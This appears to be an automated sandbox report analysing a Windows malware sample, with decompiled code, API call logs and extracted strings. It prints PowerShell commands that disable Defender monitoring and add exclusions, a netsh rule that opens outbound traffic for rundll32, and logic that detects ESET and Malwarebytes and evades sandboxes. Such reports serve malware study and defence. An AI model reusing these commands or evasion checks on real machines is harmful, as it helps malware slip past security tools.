                                                                • Associated: 0000000D.00000002.811154545.000000000044A000.00000040.00020000.sdmp
                                                                Similarity
                                                                • API ID: Process$Exitlstrcatlstrlen$CommandCountDirectoryExecuteForegroundHeapLineShellTickVersionWindowWindows
                                                                • String ID: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe$Set-MpPreference -DisableBehaviorMonitoring $true ; Set-MpPreference -MAPSReporting 0 ; Set-MpPreference -ExclusionProcess rundll32.exe ; Set-MpPreference -ExclusionExtension dll$\system32\WindowsPowershell\v1.0\powershell.exe$jdfddn$netsh.exe$open$setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe"
                                                                • API String ID: 2094461381-1796766458
                                                                • Opcode ID: 0c9e04671ade6d2247f4248d8aa14e731c24356128659f227a329f4a822deab0
                                                                • Instruction ID: de7a7ba0653631cf091694ff8dac02dc9aa62c69a0ee6aad78808433b7066509
                                                                • Opcode Fuzzy Hash: 0c9e04671ade6d2247f4248d8aa14e731c24356128659f227a329f4a822deab0
                                                                • Instruction Fuzzy Hash: 0A11D6B49503409AE3147F629C8BF083A94AB09B0DF10607FF5047B6E2CBFC861A8B5D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 68%
                                                                			E00401272(CHAR* __edx) {
                                                                				void* _t3;
                                                                
                                                                				_t3 = OpenMutexA(0x100000, 0, __edx);
                                                                				if(_t3 != 0) {
                                                                					ExitProcess();
                                                                					return _t3;
                                                                				}
                                                                				return _t3;
                                                                			}


                                                                APIs
                                                                • OpenMutexA.KERNEL32 ref: 0040127B
                                                                • ExitProcess.KERNEL32(00100000,00000000,UEFIConfig,004012FD,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000), ref: 00401284
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811078300.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000D.00000002.811102499.000000000043C000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811121010.0000000000443000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811136166.0000000000446000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811154545.000000000044A000.00000040.00020000.sdmp
                                                                Similarity
                                                                • API ID: ExitMutexOpenProcess
                                                                • String ID: UEFIConfig
                                                                • API String ID: 212532236-1949766427
                                                                • Opcode ID: a3de062cb0af37db89912758645813b9c9574f044c138b497a20feb44f0c02e0
                                                                • Instruction ID: e4f344dbafe8fc3efa988554db314d7de877d6890ccba575224d6ebf664b2d5f
                                                                • Opcode Fuzzy Hash: a3de062cb0af37db89912758645813b9c9574f044c138b497a20feb44f0c02e0
                                                                • Instruction Fuzzy Hash: F3B0125425000218DD5131B20C86B3A044D878D789F84386F3C00F01C5EA8C8C004139
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 82%
                                                                			E0040128A(void* __eax, void* __ecx) {
                                                                				char _v5;
                                                                				void* _t7;
                                                                				long _t192;
                                                                				long _t193;
                                                                				long _t194;
                                                                				long _t195;
                                                                				long _t196;
                                                                				long _t197;
                                                                				void* _t203;
                                                                				void* _t205;
                                                                				intOrPtr _t206;
                                                                				void* _t207;
                                                                				void* _t408;
                                                                				void* _t411;
                                                                				intOrPtr* _t415;
                                                                
                                                                				_t7 = HeapAlloc(__eax, 8, 0x2c4024); // executed
                                                                				 *0x440860 = _t7;
                                                                				_t408 = 0xa;
                                                                				goto L1;
                                                                				do {
                                                                					L2:
                                                                					_t207 = 0xa;
                                                                					do {
                                                                						_t7 = _t7 + 1;
                                                                						asm("rol eax, 1");
                                                                						_t207 = _t207 - 1;
                                                                					} while (_t207 != 0);
                                                                					_t411 = _t411 - 1;
                                                                				} while (_t411 != 0);
                                                                				_t408 = _t408 - 1;
                                                                				if(_t408 != 0) {
                                                                					L1:
                                                                					_t411 = 0xf;
                                                                					goto L2;
                                                                				} else {
                                                                					_push(_t7);
                                                                					 *0x447213 =  &_v5 + 1;
                                                                					if(OpenMutexA(0x100000, 0, "52b-6f11-481e-99be-b28317af8e3d") != 0) {
                                                                						ExitProcess();
                                                                						 *0x4433cf = 1;
                                                                					}
                                                                					CreateMutexA(0, 0, "52b-6f11-481e-99be-b28317af8e3d"); // executed
                                                                					RtlExitUserThread();
                                                                					RtlExitUserThread();
                                                                					RtlExitUserThread();
                                                                					RtlExitUserThread();
                                                                					if(OpenMutexA(0x100000, 0, "2707952b-6f11-481e-99be-b28317af8e3d") != 0) {
                                                                						ExitProcess();
                                                                						 *0x4433cf = 1;
                                                                					}
                                                                					RtlExitUserThread();
                                                                					RtlExitUserThread();
                                                                					RtlExitUserThread();
                                                                					RtlExitUserThread();
                                                                					RtlExitUserThread();
                                                                					RtlExitUserThread();
                                                                					RtlExitUserThread();
                                                                					RtlExitUserThread();
                                                                					RtlExitUserThread();
                                                                 					RtlExitUserThread(); // this call is repeated 118 times in a row in the decompiler output; none of those repeats was observed executing
                                                                 					RtlExitUserThread(); // executed
                                                                 					RtlExitUserThread(); // repeated a further 46 times; not executed
                                                                 					_t192 = RegOpenKeyExA(0x80000001, "Software\\ESET", 0, 0x20019, 0x4433fc); // executed  (HKEY_CURRENT_USER, KEY_READ; returns 0 = ERROR_SUCCESS only if the key exists)
                                                                 					_t193 = _t192;
                                                                 					if(_t193 != 0) { // key absent (no ESET install): continue
                                                                 						_t194 = RegOpenKeyExA(0x80000002, "SYSTEM\\ControlSet001\\Services\\MBAMService", 0, 0x20019, 0x4433fc); // executed  (HKEY_LOCAL_MACHINE; Malwarebytes service key)
                                                                 						_t195 = _t194;
                                                                 						if(_t195 != 0) { // key absent (no Malwarebytes install): continue
                                                                 							_t196 = RegOpenKeyExA(0x80000002, "SYSTEM\\ControlSet001\\Services\\MBAMService", 0, 0x20019, 0x4433fc); // executed  (same Malwarebytes key probed a second time)
                                                                 							_t197 = _t196;
                                                                 							if(_t197 != 0) {
                                                                 								 *0x446c73 = _t197;
                                                                 								 *0x44720f = _t197;
                                                                 								GetModuleFileNameA(0, 0x447f63, 0x258); // own image path into a 0x258-byte buffer
                                                                 								if( *0x447f63 == 0x5a ||  *0x447f63 == 0x7a) { // first byte 'Z' or 'z': image is running from a Z: drive
                                                                 									Sleep(0xffffffff); // Sleep(INFINITE): never returns
                                                                 								}
                                                                 								GetWindowsDirectoryA(0x4496d3, 0x3e8);
                                                                 								lstrcatA(0x4496d3, "\\system32\\rundll32.exe"); // builds <windir>\system32\rundll32.exe
                                                                 								lstrcatA("advfirewall firewall add rule name=\"Rundll32\" dir=out action=allow protocol=any program=\"C:\\Windows\\system32\\rundll32.exe\"", 0x4496d3); // destination is a writable buffer that the decompiler shows by its string contents (the netsh advfirewall arguments) instead of its address; appends the rundll32.exe path built above
                                                                 								lstrcatA("advfirewall firewall add rule name=\"Rundll32\" dir=out action=allow protocol=any program=\"C:\\Windows\\system32\\rundll32.exe\"", 0x43f94d); // appends the data at 0x43f94d to the same buffer
                                                                 								_t203 = CreateThread(0, 0, E0040110C, 0, 0, 0x43fb88); // executed  (worker thread, entry E0040110C)
                                                                 								_push(9);
                                                                 								asm("rdtsc"); // CPU timestamp counter read; basis for an RDTSC timing check
                                                                 								asm("rol eax, 0x3");
                                                                 								 *__edi = _t203;
                                                                 								asm("rol eax, 0x2");
                                                                 								_t205 = _t203 - 1 + 1;
                                                                 								 *0x00446C87 = _t205;
                                                                 								asm("rol eax, 1");
                                                                 								 *0x00446C8B = _t205;
                                                                 								_push(_t205);
                                                                 								 *0x4468e1 =  &M0043F9B5;
                                                                 								 *0x4468e1 =  *0x4468e1 + 0x64;
                                                                 								_t206 =  *0x4468e1; // 0x43fa19
                                                                 								_push(0x2eee4d);
                                                                 								 *_t415 =  *_t415 + 0x112d22;
                                                                 								return _t206;
                                                                 							} else {
                                                                 								ExitThread(); // Malwarebytes key found: abort
                                                                 								return _t197;
                                                                 							}
                                                                 						} else {
                                                                 							ExitThread(); // Malwarebytes key found: abort
                                                                 							return _t195;
                                                                 						}
                                                                 					} else {
                                                                 						ExitThread(); // ESET key found: abort
                                                                 						return _t193;
                                                                 					}
                                                                 				}
                                                                 			}

[Instruction address column from the report's side-by-side view, detached from the decompiled lines above during extraction; the listed addresses run from 0x00401292 to 0x00401a6a.]
                                                                0x00401a6f
                                                                0x00401a71
                                                                0x00401a7b
                                                                0x00401a85
                                                                0x00401a98
                                                                0x00401aa4
                                                                0x00401ab1
                                                                0x00401ab1
                                                                0x00401ac0
                                                                0x00401acf
                                                                0x00401ade
                                                                0x00401aed
                                                                0x00401b04
                                                                0x00401b16
                                                                0x00401b28
                                                                0x00401b2a
                                                                0x00401b2f
                                                                0x00401b31
                                                                0x00401b34
                                                                0x00401b36
                                                                0x00401b39
                                                                0x00401b3c
                                                                0x00401b3f
                                                                0x00401b4c
                                                                0x00401b56
                                                                0x00401b5d
                                                                0x00401b62
                                                                0x00401b67
                                                                0x00401b6e
                                                                0x00401a73
                                                                0x00401a73
                                                                0x00401a78
                                                                0x00401a78
                                                                0x00401a4e
                                                                0x00401a4e
                                                                0x00401a53
                                                                0x00401a53
                                                                0x00401a29
                                                                0x00401a29
                                                                0x00401a2e
                                                                0x00401a2e
                                                                0x00401a27

                                                                APIs
                                                                • HeapAlloc.KERNEL32(00000000,00000008,002C4024,00401109,00000000,00000000,00000000,00000000,setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe",00000007,00000000), ref: 00401292
                                                                • OpenMutexA.KERNEL32 ref: 004012D0
                                                                • ExitProcess.KERNEL32(00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000,00000000,00000000,setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe",00000007,00000000), ref: 004012D9
                                                                • CreateMutexA.KERNEL32(?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000,00000000,00000000,setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe"), ref: 004012EE
                                                                • RtlExitUserThread.NTDLL(?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000,00000000,00000000,setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe"), ref: 004012F8
                                                                • RtlExitUserThread.NTDLL(?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000,00000000,00000000,setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe"), ref: 00401302
                                                                • RtlExitUserThread.NTDLL(?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000,00000000,00000000,setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe"), ref: 0040130C
                                                                • RtlExitUserThread.NTDLL(?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000,00000000,00000000,setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe"), ref: 00401316
                                                                • OpenMutexA.KERNEL32 ref: 00401329
                                                                • ExitProcess.KERNEL32(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401332
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401343
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 0040134D
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401357
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401361
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 0040136B
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401375
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 0040137F
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401389
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401393
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 0040139D
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004013A7
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004013B1
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004013BB
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004013C5
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004013CF
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004013D9
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004013E3
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004013ED
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004013F7
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401401
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 0040140B
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401415
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 0040141F
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401429
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401433
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 0040143D
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401447
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401451
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 0040145B
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401465
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 0040146F
                                                                  • Part of subcall function 00401272: OpenMutexA.KERNEL32 ref: 0040127B
                                                                  • Part of subcall function 00401272: ExitProcess.KERNEL32(00100000,00000000,UEFIConfig,004012FD,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000), ref: 00401284
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401479
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401483
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 0040148D
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401497
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004014A1
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004014AB
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004014B5
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004014BF
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004014C9
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004014D3
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004014DD
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004014E7
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004014F1
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004014FB
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401505
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 0040150F
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401519
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401523
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 0040152D
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401537
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401541
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 0040154B
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401555
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 0040155F
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401569
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401573
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 0040157D
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401587
